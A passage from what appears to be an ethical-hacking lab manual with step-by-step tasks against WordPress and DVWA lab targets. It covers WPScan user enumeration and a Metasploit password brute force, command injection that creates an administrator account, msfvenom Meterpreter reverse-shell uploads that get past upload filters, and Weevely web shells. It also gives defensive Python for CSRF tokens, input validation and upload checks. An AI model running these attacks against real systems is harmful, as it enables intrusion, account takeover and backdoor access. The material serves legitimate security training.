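        raise PermissionError("missing or invalid CSRF token")
    for key, value in form.items():
        if key != "csrf_token":
            settings[key] = value
    return settings


def simulate(forged_fields, legitimate=False):
    """Constructed victim session: returns the settings after the request."""
    session = {}
    settings = {"default_message": "This is CEH lab.", "default_caption": "CEH Labs"}
    token = issue_csrf_token(session)
    form = dict(forged_fields)
    if legitimate:
        form["csrf_token"] = token       # only the site's own page knows this
    try:
        save_settings(session, form, settings)
    except PermissionError:
        pass                             # forged request rejected
    return settings


if __name__ == "__main__":
    print(csrf_poc_page(SETTINGS_URL, FORGED_FIELDS))
    print("forged request, no token:", simulate(FORGED_FIELDS))
    print("legitimate request      :", simulate(FORGED_FIELDS, legitimate=True))
```

The attacker’s page cannot read the token because it lives on another origin, which is what makes the check work; WordPress core implements the same idea with nonces, and a SameSite=Lax or Strict session cookie adds a second, browser-enforced layer.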

Task 5: Enumerate and Hack a Web Application using WPScan and Metasploit
The Metasploit Framework is a penetration testing toolkit, exploit development
platform, and research tool that includes hundreds of working remote exploits for a
variety of platforms. It helps pen testers to verify vulnerabilities and manage security
assessments.

In this task, we will perform multiple attacks on a vulnerable PHP website (WordPress) in
an attempt to gain sensitive information such as usernames and passwords. You will
also learn how to use the WPScan tool to enumerate usernames on a WordPress
website, and how to crack passwords by performing a dictionary attack using an msf
auxiliary module.

Ensure that the Wampserver is running in Windows Server 2016. To launch Wampserver, switch to the Windows Server 2016 machine and double-click the Wampserver icon on the Desktop.
1. Click Parrot Security to switch to the Parrot Security machine.
2. Click the MATE Terminal icon at the top of the Desktop window to open
a Terminal window.

3. A Parrot Terminal window appears. In the terminal window, type sudo su and press Enter to run the programs as a root user.

If a Question pop-up window appears, asking you to update the machine, click No to close the window.
4. In the [sudo] password for attacker field, type toor as a password
and press Enter.

The password that you type will not be visible.


5. Now, type cd and press Enter to jump to the root directory.
6. In the Terminal window, type wpscan --api-token [API Token] --url http://10.10.10.16:8080/CEH --enumerate u and press Enter.

--enumerate u: specifies the enumeration of usernames.


Here, we will use the API token that we obtained by registering with
the https://wpscan.com/register website.
7. WPScan begins to enumerate the usernames stored in the website’s
database. The result appears, displaying detailed information from the target
website.

8. Scroll down to the User(s) Identified section and observe the information regarding the available user accounts.
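WPScan’s --enumerate u does not read the database; it infers usernames from the site’s own behaviour. The following is an added example, not WPScan’s code, of two well-known WordPress user-enumeration techniques that WPScan also relies on: a default install answers /?author=N with a redirect to /author/<slug>/, and /wp-json/wp/v2/users lists users who have published posts. fetch(path) is any callable returning (status, headers, body); the responses below are constructed to imitate a site with two users and are not output from the lab target.

```python
import json
import re
from urllib.parse import urlsplit

# Added example (not part of the lab): two user-enumeration techniques run
# against constructed responses. fetch(path) -> (status, headers, body).


def users_from_author_redirects(fetch, max_id=10):
    """/?author=N redirects to /author/<slug>/ on a default WordPress install."""
    found = {}
    for author_id in range(1, max_id + 1):
        status, headers, _ = fetch(f"/?author={author_id}")
        location = {k.lower(): v for k, v in headers.items()}.get("location", "")
        match = re.search(r"/author/([^/?#]+)/?", urlsplit(location).path)
        if status in (301, 302) and match:
            found[author_id] = match.group(1)
    return found


def users_from_rest_api(fetch):
    """The REST API lists users with published posts at /wp-json/wp/v2/users."""
    status, _, body = fetch("/wp-json/wp/v2/users")
    if status != 200:
        return {}
    return {u["id"]: u["slug"] for u in json.loads(body)}


def enumerate_users(fetch, max_id=10):
    """Merge both sources; the REST API slug wins where both report an id."""
    found = users_from_author_redirects(fetch, max_id)
    found.update(users_from_rest_api(fetch))
    return found


# Constructed responses imitating a site with two users (not lab output).
_FAKE_SITE = {
    "/?author=1": (301, {"Location": "http://10.10.10.16:8080/CEH/author/admin/"}, ""),
    "/?author=2": (301, {"Location": "http://10.10.10.16:8080/CEH/author/editor/"}, ""),
    "/wp-json/wp/v2/users": (200, {"Content-Type": "application/json"},
                             json.dumps([{"id": 1, "name": "admin", "slug": "admin"}])),
}


def fake_fetch(path):
    """Stand-in for an HTTP client; unknown paths answer 404."""
    return _FAKE_SITE.get(path, (404, {}, ""))


if __name__ == "__main__":
    for uid, slug in sorted(enumerate_users(fake_fetch).items()):
        print(f"id {uid}: {slug}")
```

The author-redirect source finds users even when they have never published, which is why it is worth keeping alongside the REST API; a hardened site blocks both (no author redirects, REST users endpoint restricted to authenticated requests), and the functions then return empty results.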
9. Now that you have successfully obtained the usernames stored in the
database, you need to find their passwords.

10. To obtain the passwords, you will use the auxiliary module
called wordpress_login_enum (in msfconsole) to perform a dictionary
attack using the password.txt file (in the Wordlist folder) which you copied
to the location /home/attacker/Desktop/CEHv11 Module 14 Hacking
Web Applications.

11. To use the wordpress_login_enum auxiliary module, you need to first launch msfconsole. However, before this, you need to start the PostgreSQL service.

12. In the terminal window, type service postgresql start and press Enter to start the PostgreSQL service.
13. Type msfconsole and press Enter to launch the Metasploit framework.

14. In msfconsole, type use auxiliary/scanner/http/wordpress_login_enum and press Enter.
15. This module allows you to enumerate the login credentials.

16. To know all options available to configure in this Metasploit module, type show options, and press Enter.

17. This provides a list of options that can be set for this module. As we must obtain the password for the target user account, we will set the options below:

o PASS_FILE: Sets the password file (password.txt) with which you will perform the dictionary attack
o RHOSTS: Sets the target machine (here, the Windows Server 2016 IP address)
o RPORT: Sets the target machine port (here, the Windows Server 2016 port, 8080)
o TARGETURI: Sets the base path to the WordPress website (here, http://[IP Address of Windows Server 2016]:8080/CEH)
o USERNAME: Sets the username that was obtained in Step 8 (here, admin)
18. Now, in the msfconsole, type the below commands:

o Type set PASS_FILE /home/attacker/Desktop/CEHv11 Module 14 Hacking Web Applications/Wordlist/password.txt and press Enter to set the file containing the passwords (here, we are using the password.txt password file).
o Type set RHOSTS [IP Address of Windows Server
2016] (here, 10.10.10.16) and press Enter to set the target IP
address. (Here, the IP address of Windows Server
2016 is 10.10.10.16).
o Type set RPORT 8080 and press Enter to set the target port.
o Type set TARGETURI http://[IP Address of Windows Server
2016]:8080/CEH and press Enter to set the base path to the
WordPress website (Here, the IP address of Windows Server
2016 is 10.10.10.16).
o Type set USERNAME admin and press Enter to set the username
as admin.
You may issue any one of the usernames that you have obtained during the
enumeration process in Step 8. In this task, the admin user is being issued.
19. All the options have successfully been set. Type run and press Enter to
execute the auxiliary module.

20. Observe that the auxiliary module initially enumerates details such as the
ID number and the stored location of the username admin, and then begins
to brute-force the login credentials by trying various passwords for the given
username.
21. The auxiliary module tests various passwords against the given username
(admin) and the cracked password is displayed, as shown in the screenshot.

Here, the cracked password is qwerty@123, which might differ in your lab
environment.
22. Now, use the obtained username-password combination to log into the
WordPress website. (Here, Username: admin and Password: qwerty@123).

23. Now, click the Firefox icon from the top section of Desktop to launch
the Mozilla Firefox browser.

24. In the address bar, type http://[IP Address of Windows Server 2016]:8080/CEH/wp-login.php and click the Log In button.

If a Would you like Firefox to save this login notification appears at the
top of the browser window, click Don’t Save.
25. Observe that you are successfully logged into the target WordPress
website (http://10.10.10.16:8080/CEH) and that you can see the website
content.
26. Similarly, you can crack the passwords of other users by first selecting a particular username from Step 8 and then performing Steps 12-21.

27. This concludes the demonstration of how to enumerate and hack a web
application using WPScan and Metasploit.

28. Close all open windows on both the machines (Windows Server
2016 and Parrot Security) and document all the acquired information.

Task 6: Exploit a Remote Command Execution Vulnerability to Compromise a Target Web Server
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is extremely
vulnerable. The main objective of DVWA is to aid security professionals in testing their
skills and tools in a legal environment, to help web developers better understand the
processes of securing web applications, and to aid teachers and students in teaching
and learning web application security in a classroom environment.
In this task, we will exploit a command injection vulnerability in DVWA. You will learn how to extract information about the target machine, create a user account, assign administrative privileges to that account, and use it to log in to the target machine.

1. Click Windows 10 to switch to the Windows 10 machine.


2. Launch any browser (in this lab, we are using Mozilla Firefox). Click in the address bar of the browser, type http://10.10.10.16:8080/dvwa/login.php, and press Enter.

The IP address of the Windows Server 2016 in this lab is 10.10.10.16, which might vary in your lab environment.
3. The DVWA login page appears; type
the Username and Password as gordonb and abc123. Click
the Login button.

If a Would you like Firefox to save this login notification appears at the
top of the browser window, click Don’t Save.

4. You are successfully logged in, and the DVWA main webpage appears.
Click Command Injection from the options available in the left pane.
5. The Vulnerability: Command Injection page appears; under the Ping
a device section, type the IP address of the Windows Server
2016 machine (here, 10.10.10.16) into the Enter an IP address field and
click the Submit button to ping the machine.

The command injection utility in DVWA allows you to ping the target
machine.
6. DVWA successfully pings the target machine, as shown in the
screenshot.
7. Now, try to issue a different command to check whether DVWA can
execute it.

8. Type | hostname into the Enter an IP address field and click Submit.
This command is used to probe the hostname of the target machine.

9. As you have issued a command instead of entering the IP address of a machine, the application returns an error, as shown in the screenshot.
10. The result indicates that the DVWA application is secure.

11. Now, check the security setting of the web application. To do so,
click DVWA Security in the left pane.

12. The DVWA Security page appears. Observe that the security level
is Impossible. This security setting was blocking you from executing
commands other than simply pinging a machine.

13. Now, to exploit the command execution vulnerability, set the Security
Level of the web application to low by selecting the option Low from the
drop-down list and click Submit.

Here, your intention would be to show that a weakly secured web application
is the prime focus of attackers, who seek to exploit its vulnerabilities.
14. You have configured a weak security setting in DVWA. Now, try to
execute a command other than ping.

15. Click Command Injection from the left-pane.

16. The Vulnerability: Command Injection page appears; type | hostname into the Enter an IP address field, and click Submit.

17. DVWA returns the name of the Windows Server 2016 machine, as
shown in the screenshot.
18. This indicates that the command execution field is vulnerable and that you can remotely execute commands.

19. Now, extract more information regarding the target machine, Windows
Server 2016.

20. Type the command | whoami and click Submit.


21. The application displays the user, group, and privileges information for
the user currently logged onto the Windows Server 2016 machine, as
shown in the screenshot.
22. Now, type | tasklist, and click Submit to view the processes running on
the machine.
23. A list of all the running processes on the Windows Server
2016 machine is displayed, as shown in the screenshot.

24. To check if you can terminate a process, choose any process from the list
(here, Microsoft.ActiveDirectory), and note down its process PID
(here, 2172).

The list of running processes might differ in your lab environment.


25. Type | Taskkill /PID [Process ID value of the desired
process] /F (here, PID is 2172) and click Submit. By issuing this command,
you are forcefully (/F) terminating the process.
26. The process will be successfully terminated, as shown in the screenshot.

To confirm that the process has successfully been terminated, you can issue
the | tasklist command again to check the running processes.
27. Now, to view the directory structure of the Windows Server
2016 machine, type | dir C:\ and click Submit to view the files and
directories on the C:\ drive.
28. The directory structure of the C drive of the target server (Windows
Server 2016) is displayed, as shown in the screenshot.
29. In the same way, you can issue commands to view other directories.

30. Now, try to obtain information related to user accounts.

31. To view user account information, type | net user, and click Submit.

32. DVWA obtains the user account information from the Windows Server 2016 machine and lists it, as shown in the screenshot.
33. Now, use the command execution vulnerability and attempt to add a user
account remotely.

34. Create an account named Test. To do so, type | net user Test /Add and
click Submit.
35. The command completed successfully notification appears and a user
account named Test is created.
36. To view the new user account, type the command | net user and
click Submit.

37. You can observe the newly created account Test, as shown in the
screenshot.

38. Now, view the new account’s information. Type | net user Test and
click Submit.
39. The Test account information appears. You can see that Test is a
standard user account and does not have administrative privileges. You can
see that it has an entry called Local Group Memberships.
40. Now, assign administrative privileges to the account. The reason for
granting administrative privileges to this account is to use this (admin)
account to log into the Windows Server 2016 machine with administrator
access using a remote desktop connection.

41. To grant administrative privileges, type | net localgroup Administrators Test /Add and click Submit.
42. You have successfully granted admin privileges to the account. Confirm
the new setting by issuing the command | net user Test. Test is now an
administrator account under the Local Group Memberships option.
43. Now, log into the Windows Server 2016 machine using
the Test account through Remote Desktop Connection.

44. Click the Type here to search field from the bottom of Desktop and
type Remote. Click Remote Desktop Connection from the results.

45. The Remote Desktop Connection window appears. In the Computer field, type the target system IP address (here, 10.10.10.16 [Windows Server 2016]) and click Show Options.
46. The Remote Desktop Connection window appears with
the General tab displayed; enter the User name as test and
click Connect.
47. A Windows Security pop-up appears; leave the Password field empty
and click OK.
48. A Remote Desktop Connection window appears; click Yes.

49. A remote desktop connection is successfully established, as shown in the screenshot.

Thus, you have made use of a command execution vulnerability in a DVWA application hosted by the Windows Server 2016 machine, extracted information related to the machine, remotely created an administrator account, and logged into it.
50. Now, you may discontinue the session and log out of the web application.
To do so, close the Remote Desktop Connection window. If
a Your remote session will be disconnected notification appears,
click OK.

51. This concludes the demonstration of how to exploit a remote command execution vulnerability to compromise a target web server.

52. Close all open windows and document all the acquired information.
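The difference between the Impossible and Low results in Steps 9 to 18 comes down to how the ping handler treats the input field. The Python below is an added example, not DVWA's code: a vulnerable handler that only builds the shell string it would run, beside a hardened one that validates the field as a single IPv4 address and runs ping with an argv list and no shell (the function names and PING_COUNT_FLAG are my own).

```python
"""Added example (not DVWA's code): the pattern behind the Command Injection page,
as a vulnerable ping handler beside a hardened one. The vulnerable version only
builds the shell string it would run; the hardened version validates the field
as an IPv4 address and runs ping with an argv list and no shell."""
import ipaddress
import subprocess
from typing import List

PING_COUNT_FLAG = "-c"   # "-n" on the Windows target used in the lab


def vulnerable_ping_command(user_input: str) -> str:
    """Low-level style: concatenate the field into a shell command string.
    A value such as '| hostname' or '| net user Test /Add' is then parsed by
    the shell as a second command. Returned here, deliberately not executed."""
    return f"ping {PING_COUNT_FLAG} 3 " + user_input


# Characters that only make sense if the input is meant for a shell.
SHELL_METACHARS = set("|&;$`<>()\n\r")


def validate_ping_target(user_input: str) -> str:
    """Impossible-level style: accept only one syntactically valid IPv4 address.
    Raises ValueError on anything else, including a valid IP with trailing junk."""
    candidate = user_input.strip()
    if any(ch in SHELL_METACHARS for ch in candidate):
        raise ValueError("shell metacharacter in input")
    # IPv4Address rejects hostnames, spaces, '10.10.10.16 | tasklist', etc.
    return str(ipaddress.IPv4Address(candidate))


def hardened_ping_argv(user_input: str) -> List[str]:
    """Build the argv list for subprocess. With shell=False nothing interprets
    '|' or '&', and the single argument has already been validated."""
    return ["ping", PING_COUNT_FLAG, "3", validate_ping_target(user_input)]


def hardened_ping(user_input: str) -> str:
    """Run the validated ping without a shell and return its standard output."""
    result = subprocess.run(hardened_ping_argv(user_input), capture_output=True,
                            text=True, timeout=15, check=False)
    return result.stdout


def is_injection_attempt(user_input: str) -> bool:
    """True when the field fails validation; a good point to log and alert."""
    try:
        validate_ping_target(user_input)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Constructed inputs mirroring the lab: the plain IP, then the injected commands.
    for sample in ["10.10.10.16", "| hostname", "| net user Test /Add"]:
        verdict = "REJECTED" if is_injection_attempt(sample) else "accepted"
        print(f"{sample!r:28} {verdict:9} shell string would be: {vulnerable_ping_command(sample)!r}")
```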

Task 7: Exploit a File Upload Vulnerability at Different Security Levels
Metasploit Framework is a tool for developing and executing exploit code against a
remote target machine. It is a Ruby-based, modular penetration testing platform that
enables you to write, test, and execute exploit code. It contains a suite of tools that you
can use to test security vulnerabilities, enumerate networks, execute attacks, and
evade detection. Meterpreter is a Metasploit attack payload that provides an interactive
shell that can be used to explore the target machine and execute code.

Here, we will exploit a file upload vulnerability at different security levels of DVWA using Metasploit.
Before starting this task, ensure that the WampServer is running on the Windows
Server 2016 machine.
1. Click Parrot Security to switch to the Parrot Security machine.
2. Click the MATE Terminal icon at the top of Desktop to open
a Terminal window.

3. A Parrot Terminal window appears. In the terminal window, type sudo su and press Enter to run the programs as a root user.

4. In the [sudo] password for attacker field, type toor as a password and press Enter.

The password that you type will not be visible.


5. Now, type cd and press Enter to jump to the root directory.
6. In the Terminal window, type msfvenom -p php/meterpreter/reverse_tcp LHOST=[IP Address of Host Machine] LPORT=4444 -f raw and press Enter.

Here, the IP address of the host machine is 10.10.10.13 (the Parrot Security machine).
7. The raw payload is generated in the terminal window. Select the payload,
right-click on it, and click Copy from the context menu to copy the payload,
as shown in the screenshot.
8. Now, in the terminal window, type cd /home/attacker/Desktop/ and
press Enter to navigate to the Desktop.

9. Type pluma upload.php and press Enter to launch the Pluma text
editor.
10. The Pluma text editor window appears; press Ctrl+V to paste the raw payload copied in Step 7, and then press Ctrl+S to save the file.
11. Close all the open windows.

12. Click the Firefox icon from the top section of Desktop, type http://10.10.10.16:8080/dvwa/login.php into the address bar, and press Enter.

13. The DVWA login page appears; enter the Username and Password as admin and password. Click the Login button.

If a Would you like Firefox to save this login notification appears at the
top of the browser window, click Don’t Save.
14. The Welcome to Damn Vulnerable Web Application! Page appears.
Click DVWA Security in the left pane to view the DVWA security level.

15. Change the security level from impossible to low by selecting Low from
the drop-down list and clicking the Submit button, as shown in the
screenshot.
16. Click the File Upload option from the left pane.

17. The Vulnerability: File Upload page appears; click the Browse… button to upload a file.
18. When the File Upload window appears, navigate to
the Desktop location, select the payload file upload.php, and click Open.
19. Observe that the selected file (upload.php) appears to the right
of Browse… button.

20. Now, click the Upload button to upload the file to the database.
21. You will see a message saying that the file has been uploaded
successfully, with the location of the file. Note the location of the file and
minimize the browser window.
22. Launch a Terminal window by clicking on the MATE Terminal icon at
the top of Desktop.

23. In the terminal window, type sudo su and press Enter to run the
programs as a root user.

24. In the [sudo] password for attacker field, type toor as a password
and press Enter.

The password that you type will not be visible.


25. Now, type cd and press Enter to jump to the root directory.
26. In the Terminal window, type msfconsole and press Enter to launch
the Metasploit framework.

27. In msfconsole, type use exploit/multi/handler and press Enter to set up the listener.
28. Now, set the payload, LHOST, and LPORT. To do so, use the below
commands:

o Type set payload php/meterpreter/reverse_tcp and press Enter
o Type set LHOST 10.10.10.13 and press Enter
o Type set LPORT 4444 and press Enter
o Type run and press Enter to start the listener
29. Observe that the listener is up and running at 10.10.10.13. Minimize the
terminal window.
30. Switch back to the Mozilla Firefox window where the DVWA website is
open. Open a new tab,
type http://10.10.10.16:8080/dvwa/hackable/uploads/upload.php in
the address bar, and press Enter to execute the uploaded payload.
31. Switch back to the Terminal window and observe that a Meterpreter
session has successfully been established with the victim system, as shown
in the screenshot.
32. In the meterpreter command line, type sysinfo and press Enter to view
the system details of the victim machine.
33. Close all open windows.

34. Launch a new Terminal window by clicking on the MATE Terminal icon
at the top of Desktop window.

35. In the terminal window, type sudo su and press Enter to run the
programs as a root user.

36. In the [sudo] password for attacker field, type toor as a password
and press Enter.

The password that you type will not be visible.


37. Now, type cd and press Enter to jump to the root directory.
38. In the Terminal window, type msfvenom -p
php/meterpreter/reverse_tcp LHOST=[IP Address of Host Machine]
LPORT=3333 -f raw and press Enter.

Here, the IP address of the host machine is 10.10.10.13 (Parrot Security machine).
39. The raw payload is generated in the terminal window. Select the payload,
right-click on it, and click Copy from the context menu to copy the payload,
as shown in the screenshot.
40. Now, in the terminal window, type cd /home/attacker/Desktop/ and
press Enter to navigate to the Desktop.

41. Type pluma medium.php.jpg and press Enter to launch the Pluma text editor.
42. The Pluma text editor window appears; press Ctrl+V to paste the raw payload copied in Step 39, and then press Ctrl+S to save the file.
43. Click the Firefox icon from the top section of Desktop, type http://10.10.10.16:8080/dvwa/login.php into the address bar, and press Enter. The DVWA login page appears; log in with the credentials admin and password, and click the Login button.

If a Would you like Firefox to save this login notification appears at the
top of the browser window, click Don’t Save.
44. The Welcome to Damn Vulnerable Web Application! Page appears.
Click DVWA Security from the left pane to view the DVWA security level.

45. Change the Security Level from impossible to medium by selecting Medium from the drop-down list and clicking the Submit button, as shown in the screenshot.
46. Click the File Upload option in the left pane.

47. The Vulnerability: File Upload page appears; click the Browse… button to upload a file.
48. The File Upload window appears. Navigate to the Desktop location and
select the payload file medium.php.jpg and click Open.
49. Observe that the selected file (medium.php.jpg) appears to the right
of the Browse… button.

50. Now, before uploading the file, set up a Burp Suite proxy. Start by
configuring the proxy settings of the browser.

51. Click the Open Menu icon in the right corner of the menu bar and
select Preferences from the list.
52. The General settings tab appears. In the Find in Preferences search
bar, type proxy, and press Enter.

53. The Search Results appear; click the Settings button under
the Network Settings option.
54. A Connection Settings window appears; select the Manual proxy
configuration radio button and ensure that the HTTP Proxy is set
to 127.0.0.1 and Port as 8080. Ensure that the Use this proxy server for
all protocols checkbox is selected and click OK. Close
the Preferences tab.
55. Now, minimize the browser window, click Applications from the top left
corner of Desktop and navigate to Pentesting --> Web Application
Analysis --> Web Application Proxies --> burpsuite to launch the Burp
Suite application.
56. A security pop-up appears, enter the password as toor in
the Password field and click OK.
57. In the next Burp Suite Community Edition notification, click OK.
58. A notification appears saying that An update is available, click Close.

59. The Burp Suite main window appears. Ensure that the Temporary
project radio button is selected and click the Next button, as shown in the
screenshot.
60. In the next window, select the Use Burp defaults radio-button and click
the Start Burp button.
61. The Burp Suite main window appears; click the Proxy tab from the
available options in the top section of the window.
62. In the Proxy settings, the Intercept tab opens by default. Observe that interception is active by default, as the button says Intercept is on. Leave it running.

Turn the interception on if it is set to off.


63. Switch back to the browser window and click the Upload button under
the Vulnerability: File Upload section to upload the payload file.
64. Switch back to the Burp Suite window. Observe that the request has
been captured and displayed in the raw format under the Raw tab. In
the filename field, you will see the name of the file to be uploaded
as medium.php.jpg.
65. Change the filename to medium.php and click the Forward button to
forward the request.
66. Now, turn the interception off by clicking on the Intercept is on button.
The button now says Intercept is off, as shown in the screenshot. Close the
window.

If a Confirm pop-up appears, click Yes.


67. Switch back to the browser window. Observe a message saying that the
file has been uploaded successfully, along with the upload location of the file.
Note down this location.
68. Remove the browser proxy set up in Step 54 by selecting the No
proxy radio-button in the Connection Settings window and clicking OK.
Close the tab.
69. Launch a Terminal window by clicking on the MATE Terminal icon at
the top of Desktop.

70. In the terminal window, type sudo su and press Enter to run the
programs as a root user.

71. In the [sudo] password for attacker field, type toor as a password
and press Enter.

The password that you type will not be visible.


72. Now, type cd and press Enter to jump to the root directory.
73. In the Terminal window, type msfconsole and press Enter to launch
the Metasploit framework.

74. In msfconsole, type use exploit/multi/handler and press Enter to begin setting up the listener.

75. You have to set up a listener so that you can establish a Meterpreter session with your victim. Follow the steps given below to set up a listener using the msf command line:

o Type set payload php/meterpreter/reverse_tcp and press Enter
o Type set LHOST 10.10.10.13 and press Enter
o Type set LPORT 3333 and press Enter
o Type run and press Enter to start the listener
76. Switch to the Mozilla Firefox window where the DVWA website is open. Open a new tab, type http://10.10.10.16:8080/dvwa/hackable/uploads/medium.php into the address bar and press Enter to execute the uploaded payload.
77. Switch back to the Terminal window and observe that a Meterpreter
session has successfully been established with the victim system.
78. In the meterpreter command line, type sysinfo and press Enter to view
the system details of the victim machine.
79. Close all open windows.

80. Launch a Terminal window by clicking on the MATE Terminal icon at the top of Desktop.

81. In the terminal window, type sudo su and press Enter to run the
programs as a root user.

82. In the [sudo] password for attacker field, type toor as a password
and press Enter.

The password that you type will not be visible.


83. Now, type cd and press Enter to jump to the root directory.
84. In the Terminal window, type msfvenom -p
php/meterpreter/reverse_tcp LHOST=[IP Address of Host Machine]
LPORT=2222 -f raw and press Enter.

Here, the IP address of the host machine is 10.10.10.13 (Parrot Security machine).
85. The raw payload is generated in the terminal window. Select the payload,
right-click on it, and click Copy from the context menu to copy the payload,
as shown in the screenshot.
86. Now, in the terminal window, type cd /home/attacker/Desktop/ and
press Enter to navigate to the Desktop.

87. Type pluma high.jpeg and press Enter to launch the Pluma text editor.
88. The Pluma text editor window appears; press Ctrl+V to paste the raw payload copied in Step 85. Edit the payload file by adding GIF98 to the first line and then press Ctrl+S to save the file.
89. Close all open windows.

90. Click the Firefox icon from the top section of Desktop,
type http://10.10.10.16:8080/dvwa/login.php into the address bar and
press Enter. The DVWA login page appears. Log in with the
credentials admin and password, and click the Login button.

If a Would you like Firefox to save this login notification appears at the
top of the browser window, click Don’t Save.
91. The Welcome to Damn Vulnerable Web Application! Page appears;
click DVWA Security in the left pane to view the DVWA security level.

92. Change the Security Level from impossible to high by selecting High from the drop-down list and clicking the Submit button, as shown in the screenshot.
93. Click the File Upload option in the left pane. The Vulnerability: File
Upload page appears. Click the Browse… button to upload a file.
94. The File Upload window appears. Navigate to the Desktop location,
select the payload file high.jpeg, and click Open.
95. Observe that the selected file (high.jpeg) appears to the right of
the Browse… button.

96. Now, click the Upload button to upload the file to the database.
97. You will see a message saying that the file has been uploaded
successfully, along with the location of the uploaded file. Note down this
location.
98. Now, click the Command Injection option in the left pane.
The Vulnerability: Command Injection window appears; in the Enter an
IP address field, type |copy C:\wamp64\www\DVWA\hackable\uploads\
high.jpeg C:\wamp64\www\DVWA\hackable\uploads\shell.php and
click the Submit button.
99. Observe a message saying that the file has been copied, as shown in the
screenshot.
100. Launch a Terminal window by clicking on the MATE Terminal icon at
the top of Desktop.

101. A Parrot Terminal window appears. In the terminal window, type sudo su and press Enter to run the programs as a root user.

102. In the [sudo] password for attacker field, type toor as a password
and press Enter.

The password that you type will not be visible.


103. Now, type cd and press Enter to jump to the root directory.
104. In the Terminal window, type msfconsole and press Enter to launch
the Metasploit framework.

105. In msfconsole, type use exploit/multi/handler and press Enter to begin setting up the listener.

106. You have to set up a listener so that you can establish a Meterpreter session with your victim. Follow the steps given below to set up a listener using the msf command line:

o Type set payload php/meterpreter/reverse_tcp and press Enter
o Type set LHOST 10.10.10.13 and press Enter
o Type set LPORT 2222 and press Enter
o Type run and press Enter to start the listener
107. Switch to the Mozilla Firefox window where the DVWA website is
open. Open a new tab,
type http://10.10.10.16:8080/dvwa/hackable/uploads/shell.php into
the address bar and press Enter to execute the uploaded payload.
108. Switch back to the Terminal window and observe that
a Meterpreter session has successfully been established with the victim
system.
109. In the meterpreter command line, type sysinfo and press Enter to
view the system details of the victim machine.
110. This concludes the demonstration of how to exploit a file upload
vulnerability at different security levels.

111. Close all open windows and document all the acquired information.
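Each of the three uploads above got past a different check: a bare .php file at Low, a filename renamed in Burp Suite at Medium, and a file with a GIF header at High. As an added Python example (not DVWA's code), a server-side validator that rejects all three: it ignores the client-supplied Content-Type, allows exactly one image extension, requires the magic bytes to match that extension, and scans for script markers. The sample files, the PHP_STUB standing in for the msfvenom payload, and the storage_name helper are all constructed for this example.

```python
"""Added example (not DVWA's code): a server-side upload check that rejects each
payload used in this task (upload.php, medium.php.jpg renamed in the proxy,
high.jpeg carrying a GIF header). Sample files are constructed inline."""
import os
import secrets
from typing import Dict, Tuple

# Allowed extension -> magic bytes a file with that extension must start with.
ALLOWED = {
    "jpg":  (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png":  (b"\x89PNG\r\n\x1a\n",),
    "gif":  (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 2 * 1024 * 1024
# Server-side script tags whose presence inside an "image" is never legitimate.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script", b"<%")


def validate_upload(filename: str, content_type: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason). The Content-Type header is deliberately
    ignored: it is chosen by the client, which is why a request edited in
    Burp Suite can claim image/jpeg for any file."""
    del content_type  # untrusted; never part of the decision
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) != 2 or not parts[0]:
        # 'medium.php.jpg' (double extension) or a name with no extension at all.
        return False, "exactly one extension required"
    ext = parts[1]
    if ext not in ALLOWED:
        return False, f"extension .{ext} not allowed"
    if len(data) > MAX_BYTES:
        return False, "too large"
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        # 'high.jpeg' with a GIF header: the signature must match the claimed
        # type, not merely be *some* image signature.
        return False, "content does not match extension"
    if any(marker in data for marker in SCRIPT_MARKERS):
        # Cheap defence in depth; a real deployment also re-encodes the image.
        return False, "embedded script marker"
    return True, "ok"


def storage_name(filename: str) -> str:
    """Never reuse the client's name: random name plus the allowlisted extension,
    to be written outside the web root."""
    ext = filename.rsplit(".", 1)[1].lower()
    return f"{secrets.token_hex(16)}.{ext}"


# Constructed samples mirroring the three uploads in this task plus one legitimate file.
PHP_STUB = b"<?php /* constructed stand-in for the msfvenom payload */ ?>"
SAMPLES = {
    "upload.php":     ("application/x-php", PHP_STUB),
    "medium.php.jpg": ("image/jpeg", PHP_STUB),
    "medium.php":     ("image/jpeg", PHP_STUB),            # name after the Burp edit
    "high.jpeg":      ("image/jpeg", b"GIF89a" + PHP_STUB),
    "high.gif":       ("image/gif",  b"GIF89a" + PHP_STUB),
    "photo.png":      ("image/png",  b"\x89PNG\r\n\x1a\n" + b"\x00" * 64),
}


def check_samples() -> Dict[str, bool]:
    """Verdict for every constructed sample, keyed by filename."""
    return {name: validate_upload(name, ct, data)[0] for name, (ct, data) in SAMPLES.items()}


if __name__ == "__main__":
    for name, (ct, data) in SAMPLES.items():
        ok, why = validate_upload(name, ct, data)
        print(f"{name:16} {'ACCEPT' if ok else 'REJECT':6} {why}")
```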

Task 8: Gain Backdoor Access via a Web Shell using Weevely


Gaining backdoor access refers to entering a website in a stealthy way. These backdoors are often installed via unvalidated file uploads. This vulnerability allows you to upload harmful files to the target web server. Websites developed using PHP are often susceptible to this kind of attack.

A professional ethical hacker or pen tester can use tools such as Weevely to gain
backdoor access to a website without being traced. Weevely is used to develop a
backdoor shell and upload it to a target server in order to gain remote shell access. This
tool also helps in performing administrative tasks, maintaining persistence, and
spreading backdoors across the target network.
Here, we will gain backdoor access via a web shell using Weevely.

1. On the Parrot Security machine, click the MATE Terminal icon at the
top of Desktop to open a Terminal window.

2. A Parrot Terminal window appears. In the terminal window, type sudo su and press Enter to run the programs as a root user.

If a Question pop-up window appears, asking you to update the machine, click No to close the window.
3. In the [sudo] password for attacker field, type toor as a password
and press Enter.

The password that you type will not be visible.


4. Now, type cd and press Enter to jump to the root directory.
5. In the Terminal window, type weevely generate [Password] [File Path] (here, the password is toor, and the file path is /home/attacker/Desktop/shell.php) and press Enter to generate a shell file.

Weevely encodes the payload with a key phrase so that no one else can use
it to access the target system.
6. The shell file (shell.php) is generated at the
location /home/attacker/Desktop, and it is encoded with the password
(toor). Minimize the terminal window.
7. Click the Firefox icon from the top section of Desktop, type http://10.10.10.16:8080/dvwa/login.php into the address bar and press Enter.

8. The DVWA login page appears; enter the Username and Password as admin and password. Click the Login button.

If a Would you like Firefox to save this login notification appears at the
top of the browser window, click Don’t Save.
9. The Welcome to Damn Vulnerable Web Application! Page appears.
